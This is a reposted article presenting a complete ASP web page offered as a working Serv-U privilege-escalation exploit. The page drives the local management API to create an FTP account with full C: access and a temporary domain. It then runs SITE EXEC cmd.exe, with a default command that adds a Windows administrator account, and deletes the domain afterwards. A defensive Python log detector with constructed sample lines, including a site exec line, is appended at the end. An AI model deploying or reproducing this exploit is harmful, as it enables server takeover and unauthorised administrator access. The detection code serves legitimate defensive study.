
Latest Serv-U 0day ASP code that works against all versions

程序员文章站 2022-05-01 10:54:13
Serv-U privilege-escalation code that works against all versions. 10.x can be escalated too; yesterday I succeeded on version 11. Don't add a system account or execute commands directly; connect with the added FTP account from CMD to escalate... 12-01-29...
Otherwise it is easy to make mistakes.

The code is as follows:

<style type="text/css">
<!--
body,td,th {
font-size: 12px;
}
-->
</style>
<%
' httpopen: send a request to the local Serv-U management interface and return the response body as a string
function httpopen(neirong,fangshi,dizhi,refer,cookie)
set http=server.createobject("microsoft.xmlhttp")
http.open fangshi,dizhi,false
http.setrequestheader "referer",refer
http.setrequestheader "content-type","application/x-www-form-urlencoded"
http.setrequestheader "content-length",len(neirong)
http.setrequestheader "user-agent","serv-u"
http.setrequestheader "x-user-agent","mozilla/4.0 (compatible; msie 6.0; windows nt 5.2; sv1; .net clr 1.1.4322)"
if cookie<>"" then
http.setrequestheader "cookie",cookie
end if
http.send neirong
httpopen=bytes2bstr(http.responsebody)
set http=nothing
end function
' getmidstr: return the text found between the delimiters l and r in str
function getmidstr(l,r,str)
int_left=instr(str,l)
int_right=instr(str,r)
if int_left>0 and int_right>0 then
getmidstr=mid(str,int_left+len(l),int_right-int_left-len(l))
else
getmidstr="执行的字符串中不包含“"&l&"”或“"&r&"”"
end if
end function
' bytes2bstr: convert the raw response bytes to a string (double-byte characters are kept intact)
function bytes2bstr(vin)
strreturn = ""
for i = 1 to lenb(vin)
thischarcode = ascb(midb(vin,i,1))
if thischarcode < &h80 then
strreturn = strreturn & chr(thischarcode)
else
nextcharcode = ascb(midb(vin,i+1,1))
strreturn = strreturn & chr (clng(thischarcode) * &h100 + cint(nextcharcode))
i = i + 1
end if
next
bytes2bstr = strreturn
end function
%>
<%
'----------自定义参数开始-----------
action=request("action")
loginpass=request.form("loginpass")
port=request("port")
mydomain=request.form("mydomain")
path=request.form("path")
ftpport = request.form("ftpport")
user=request.form("user")
pass=request.form("pass")
cmd= request.form("cmd")
sessionid=request("sessionid")
organizationid=request("organizationid")
userid=request("userid")
domainid=request("domainid")
'----------自定义参数结束-----------
' odd actions perform one management-API step each; even actions render the form for the next step
select case action
case 1
returns=httpopen("user=&pword="&loginpass&"&language=zh%2ccn%26","post","http://127.0.0.1:"&port&"/web%20client/login.xml?command=login&sync=1227081437828","http://127.0.0.1:"&port&"/?session=39893&language=zh,cn&localadmin=1","")
sessionid=getmidstr("<sessionid>","</sessionid>",returns)
if sessionid<>"" then
response.write "login ok!"&"</br>"
response.redirect "?action=2&sessionid="&sessionid&"&port="&port
else
response.write "error!"&"</br>"
end if
case 2
call main2()
case 3
returns=httpopen("","post","http://127.0.0.1:"&port&"/admin/serverusers.htm?page=1","",sessionid)
organizationidtemp=mid(returns,instr(returns,"organizationusers.xml&id="),len("organizationusers.xml&id=")+15)
organizationid=mid(organizationidtemp,instr(organizationidtemp,"=")+1,instr(organizationidtemp,"""")-instr(organizationidtemp,"=")-1)
if organizationid<>"" then
response.write "get organizationid "&organizationid&" ok!"&"</br>"
response.redirect "?action=4&sessionid="&sessionid&"&port="&port&"&organizationid="&organizationid
else
response.write "error!"&"</br>"
end if
case 4
call main3()
case 5
returns=httpopen("","post","http://127.0.0.1:"&port&"/admin/xml/user.xml?command=addobject&object=corganization."&organizationid&".user&temp=1&sync=1227081437828","http://127.0.0.1:"&port&"/admin/serverusers.htm?page=1",sessionid)
userid=getmidstr("<var name=""objectid"" val=""",""" />",returns)
if userid<>"" then
response.write "get userid "&userid&" ok!"&"</br>"
response.redirect "?action=6&sessionid="&sessionid&"&port="&port&"&organizationid="&organizationid&"&userid="&userid
else
response.write "error!"
end if
case 6
call main4()
case 7
returns=httpopen("access=7999&maxsize=0&dir=%2fc%3a&undefined=undefined&maxsizedisp=&","post","http://127.0.0.1:"&port&"/admin/xml/result.xml?command=addobject&object=cuser."&userid&".diraccess&sync=1227081437828","http://127.0.0.1:"&port&"/admin/serverusers.htm?page=1",sessionid)
returns=httpopen("loginid="&user&"&fullname=&password="&pass&"&combopasswordtype=%e5%b8%b8%e8%a7%84%e5%af%86%e7%a0%81&passwordtype=0&comboadmintype=%e6%97%a0%e6%9d%83%e9%99%90&admintype=&combohomedir=%2fc%3a&homedir=%2f"&path&"&combotype=%e6%b0%b8%e4%b9%85%e5%b8%90%e6%88%b7&type=0&expireson=0&combowebclientstartupmode=%e6%8f%90%e7%a4%ba%e7%94%a8%e6%88%b7%e4%bd%bf%e7%94%a8%e4%bd%95%e7%a7%8d%e5%ae%a2%e6%88%b7%e7%ab%af&webclientstartupmode=&lockinhomedir=0&enabled=1&alwaysallowlogin=1&description=&=&includerespcodesinmsgfiles=&combosignonmessagefilepath=&signonmessagefilepath=&signonmessage=&signonmessagetext=&combolimittype=%e8%bf%9e%e6%8e%a5&limittype=connection&quotabytes=0&quota=0&","post","http://127.0.0.1:"&port&"/admin/xml/result.xml?command=updateobject&object=corganization."&organizationid&".user."&userid&"&sync=1227081437828","http://127.0.0.1:"&port&"/admin/serverusers.htm?page=1",sessionid)
response.write "add user ok!"&"</br>"
response.redirect "?action=8&userid="&userid&"&port="&port&"&sessionid="&sessionid&"&organizationid="&organizationid
case 8
call main5()
case 9
returns=httpopen("domainname="&mydomain&"&description=test1&enabled=1&enableftp=1&enableftps=0&enablessh=0&enablehttp=0&enablehttps=0&ftpport="&ftpport&"&ftpsport=990&sshport=22&httpport=80&httpsport=443&bindipaddress=&","post","http://127.0.0.1:"&port&"/admin/xml/result.xml?command=objectcommand&object=cserver.0.createdomain&sync=1227081437828","http://127.0.0.1:"&port&"/admin/serverusers.htm?page=1",sessionid)
domainid=getmidstr("<objectid>","</objectid>",returns)
response.write "create domain ok!"&"</br>"
response.redirect "?action=10&userid="&userid&"&port="&port&"&sessionid="&sessionid&"&organizationid="&organizationid&"&domainid="&domainid
case 10
call main6()
case 11
set b=server.createobject("microsoft.xmlhttp")
b.open "get", "http://127.0.0.1:"&ftpport&"/", false, "", ""
b.send "user " & user & vbcrlf & "pass "& pass & vbcrlf & "site exec c:\windows\system32\cmd.exe /c "& cmd & vbcrlf & "quit" & vbcrlf
response.write replace(b.responsetext,chr(13),"<br>")
response.redirect "?action=12&userid="&userid&"&port="&port&"&sessionid="&sessionid&"&organizationid="&organizationid&"&domainid="&domainid
case 12
call main7()
case 13
returns=httpopen("ids="&domainid&"&","post","http://127.0.0.1:"&port&"/admin/xml/result.xml?command=deleteobject&object=cserver.0.domain&sync=1227081437828","http://127.0.0.1:"&port&"/admin/serverusers.htm?page=1",sessionid)
response.write "临时域清理完毕!用户请手动清理,因为serv-u的userid变化我搞不懂."&"</br>"
case else
call main1()
end select
sub main1()
%>
<form id="form1" name="form1" method="post" action="?action=1">
<table width="264" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td colspan="2" align="center"><strong>第一步:获取sessionid</strong></td>
</tr>
<tr>
<td align="right">管理端口:</td>
<td><input name="port" type="text" id="port" value="43958" /></td>
</tr>
<tr>
<td align="right">管理员密码:</td>
<td><input name="loginpass" type="text" id="loginpass" value="1" /></td>
</tr>
<tr>
<td colspan="2" align="center"><input type="submit" name="button" id="button" value="提交" />
</td>
</tr>
</table>
</form>
<p align=center><strong>一般情况下不用改,如果管理员改了的话就填上去.</strong></p>
<%
end sub
%>
<% sub main2() %>
<form id="form1" name="form1" method="post" action="?action=3&sessionid=<%=sessionid%>&port=<%=port%>">
<table width="264" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td colspan="2" align="center"><strong>第二步:获取organizationid</strong></td>
</tr>
<tr>
<td colspan="2" align="center"><input type="submit" name="button" id="button" value="提交" />
</td>
</tr>
</table>
</form>
<p align=center><strong>这一步有点慢,请等待.</strong></p>
<% end sub %>
<% sub main3() %>
<form id="form1" name="form1" method="post" action="?action=5&sessionid=<%=sessionid%>&port=<%=port%>&organizationid=<%=organizationid%>">
<table width="264" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td colspan="2" align="center"><strong>第三步:获取userid</strong></td>
</tr>
<tr>
<td colspan="2" align="center"><input type="submit" name="button" id="button" value="提交" />
</td>
</tr>
</table>
</form>
<% end sub %>
<% sub main4() %>
<form id="form1" name="form1" method="post" action="?action=7&sessionid=<%=sessionid%>&port=<%=port%>&organizationid=<%=organizationid%>&userid=<%=userid%>">
<table width="264" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td colspan="2" align="center"><strong>第四步:加用户</strong></td>
</tr>
<tr>
<td align="right">新ftp账号:</td>
<td><input name="user" type="text" id="user" value="ash" /></td>
</tr>
<tr>
<td align="right">新ftp密码:</td>
<td><input name="pass" type="text" id="pass" value="hahaha" /></td>
</tr>
<tr>
<td align="right">系统路径:</td>
<td><input name="path" type="text" id="path" value="c:" /></td>
</tr>
<tr>
<td colspan="2" align="center"><input type="submit" name="button" id="button" value="提交" />
</td>
</tr>
</table>
</form>
<% end sub %>
<% sub main5() %>
<form id="form1" name="form1" method="post" action="?action=9&port=<%=port%>&userid=<%=userid%>&sessionid=<%=sessionid%>&organizationid=<%=organizationid%>">
<table width="264" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td colspan="2" align="center"><strong>第五步:创建域</strong></td>
</tr>
<tr>
<td align="right">要添加的域:</td>
<td><input name="mydomain" type="text" id="mydomain" value="testhack" /></td>
</tr>
<tr>
<td align="right">域端口:</td>
<td><input name="ftpport" type="text" id="ftpport" value="60000" /></td>
</tr>
<tr>
<td colspan="2" align="center"><input type="submit" name="button" id="button" value="提交" />
</td>
</tr>
</table>
</form>
<% end sub %>
<% sub main6() %>
<form id="form1" name="form1" method="post" action="?action=11&port=<%=port%>&userid=<%=userid%>&sessionid=<%=sessionid%>&organizationid=<%=organizationid%>&domainid=<%=domainid%>">
<table border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td colspan="2" align="center"><strong>执行命令</strong></td>
</tr>
<tr>
<td align="right">ftp账号:</td>
<td><input name="user" type="text" id="user" value="ash" /></td>
</tr>
<tr>
<td align="right">ftp密码:</td>
<td><input name="pass" type="text" id="pass" value="hahaha" /></td>
</tr>
<tr>
<td align="right">ftp端口:</td>
<td><input name="ftpport" type="text" id="ftpport" value="60000" /></td>
</tr>
<tr>
<td align="right">你的语句:</td>
<td><input name="cmd" type="text" id="cmd" value="net user admin admin123456 /add&net localgroup administrators admin /add" size="80" /></td>
</tr>
<tr>
<td colspan="2" align="center"><input type="submit" name="button" id="button" value="提交" />
</td>
</tr>
</table>
</form>
<p align=center><strong>注意:如果是serv-u 7.0,这里可以马上点提交.</strong></p>
<p align=center><strong>注意:如果是serv-u 7.0以上,请在执行完上一步之后过大概半分钟才提交.</strong></p>

<% end sub %>
<% sub main7() %>
<form id="form1" name="form1" method="post" action="?action=13&port=<%=port%>&userid=<%=userid%>&sessionid=<%=sessionid%>&organizationid=<%=organizationid%>&domainid=<%=domainid%>">
<table width="264" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td colspan="2" align="center"><strong>删除临时域</strong></td>
</tr>
<tr>
<td colspan="2" align="center"><input type="submit" name="button" id="button" value="提交" />
</td>
</tr>
</table>
</form>
<% end sub %>

Save the code above as tmdsb.asp and you are done.
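From the defender's side, the script above leaves a recognisable trail: a login to the local management interface with a hard-coded user-agent of "serv-u" (no browser sends that), followed within seconds by addobject on a user, addobject on that user's diraccess, an objectcommand createdomain, and later a deleteobject on the domain, and then a SITE EXEC over the freshly created FTP domain. The following Python detector is an added example, not part of the original post or of Serv-U; it runs over constructed, generic access-log and FTP-log lines (Serv-U's real log layout is assumed, not copied) and flags a source that performs the login, user-creation and domain-creation calls inside one time window, the non-browser user-agent, and any SITE EXEC command.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in a generic "ts src method path query "ua"" layout.
# This is NOT Serv-U's own log format; adapt LINE_RE to the real one.
SAMPLE_HTTP_LOG = """\
2022-05-01 10:50:01 127.0.0.1 POST /web%20client/login.xml command=login&sync=1 "serv-u"
2022-05-01 10:50:05 127.0.0.1 POST /admin/serverusers.htm page=1 "serv-u"
2022-05-01 10:50:09 127.0.0.1 POST /admin/xml/user.xml command=addobject&object=corganization.1.user "serv-u"
2022-05-01 10:50:14 127.0.0.1 POST /admin/xml/result.xml command=addobject&object=cuser.7.diraccess "serv-u"
2022-05-01 10:50:20 127.0.0.1 POST /admin/xml/result.xml command=objectcommand&object=cserver.0.createdomain "serv-u"
2022-05-01 10:51:02 127.0.0.1 POST /admin/xml/result.xml command=deleteobject&object=cserver.0.domain "serv-u"
2022-05-01 11:30:00 10.0.0.5 POST /web%20client/login.xml command=login&sync=2 "Mozilla/5.0"
2022-05-01 11:31:00 10.0.0.5 GET /admin/serverusers.htm page=1 "Mozilla/5.0"
"""

# Constructed FTP command-log lines (layout assumed, not Serv-U's real format).
SAMPLE_FTP_LOG = """\
10:50:40 (000004) ash> USER ash
10:50:40 (000004) ash> PASS ****
10:50:41 (000004) ash> site exec c:\\windows\\system32\\cmd.exe /c whoami
10:52:00 (000005) bob> LIST
"""

LINE_RE = re.compile(
    r'^(?P<ts>\S+ \S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<path>\S+) (?P<query>\S*) "(?P<ua>[^"]*)"$'
)

# Stages as they appear in the URL of each management call made by the script.
# The diraccess value and account fields travel in the POST body and are not
# visible in an access log, so only the URL-visible parts are matched.
STAGES = [
    ("login",         "/web%20client/login.xml", re.compile(r"command=login")),
    ("add_user",      "/admin/xml/user.xml",     re.compile(r"command=addobject&object=corganization\.\d+\.user")),
    ("dir_access",    "/admin/xml/result.xml",   re.compile(r"command=addobject&object=cuser\.\d+\.diraccess")),
    ("create_domain", "/admin/xml/result.xml",   re.compile(r"command=objectcommand&object=cserver\.0\.createdomain")),
    ("delete_domain", "/admin/xml/result.xml",   re.compile(r"command=deleteobject&object=cserver\.0\.domain")),
]

SITE_EXEC_RE = re.compile(r"\bsite\s+exec\b", re.IGNORECASE)


def classify(line):
    """Return (timestamp, source, user-agent, stage-or-None) or None if unparsable."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
    for name, path, query_re in STAGES:
        if m["path"] == path and query_re.search(m["query"]):
            return ts, m["src"], m["ua"], name
    return ts, m["src"], m["ua"], None


def detect_provisioning(lines, window=timedelta(minutes=10)):
    """Flag sources that log in, add a user and create a domain within `window`,
    plus any management call carrying the script's hard-coded user-agent."""
    first_seen = defaultdict(dict)   # src -> stage -> earliest timestamp
    alerts = set()
    for line in lines:
        rec = classify(line)
        if rec is None or rec[3] is None:
            continue
        ts, src, ua, stage = rec
        if ua.lower() == "serv-u":
            alerts.add((src, "suspicious_user_agent"))
        first_seen[src].setdefault(stage, ts)
    needed = ("login", "add_user", "create_domain")
    for src, stages in first_seen.items():
        if all(s in stages for s in needed):
            span = max(stages[s] for s in needed) - min(stages[s] for s in needed)
            if span <= window:
                alerts.add((src, "provisioning_sequence"))
    return sorted(alerts)


def find_site_exec(ftp_lines):
    """Return FTP log lines containing a SITE EXEC command (case-insensitive)."""
    return [ln for ln in ftp_lines if SITE_EXEC_RE.search(ln)]


if __name__ == "__main__":
    for src, reason in detect_provisioning(SAMPLE_HTTP_LOG.splitlines()):
        print(f"ALERT {src}: {reason}")
    for ln in find_site_exec(SAMPLE_FTP_LOG.splitlines()):
        print(f"ALERT site exec: {ln}")
```

The sequence check keys on the earliest occurrence of each stage per source, so a legitimate administrator who creates a user one day and a domain the next will not trip the ten-minute window, while the script's back-to-back calls from 127.0.0.1 will. Treat the user-agent check as corroboration only; it is trivial to change and is listed here because the posted script hard-codes it.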